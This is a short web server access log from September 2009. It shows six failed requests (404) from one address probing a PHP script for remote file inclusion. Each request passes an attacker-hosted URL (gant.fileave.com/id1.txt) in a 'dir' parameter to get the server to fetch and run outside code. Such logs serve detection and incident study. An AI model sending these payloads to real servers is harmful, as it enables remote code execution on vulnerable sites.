114.108.131.141 - - [04/Sep/2009:03:17:07 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:17:07 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:17:07 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:17:08 -0400] "GET //skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:17:08 -0400] "GET /logs//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.108.131.141 - - [04/Sep/2009:03:17:08 -0400] "GET /logs/access_log.Q109070200//skin/zero_vote/ask_password.php?dir=http://gant.fileave.com/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
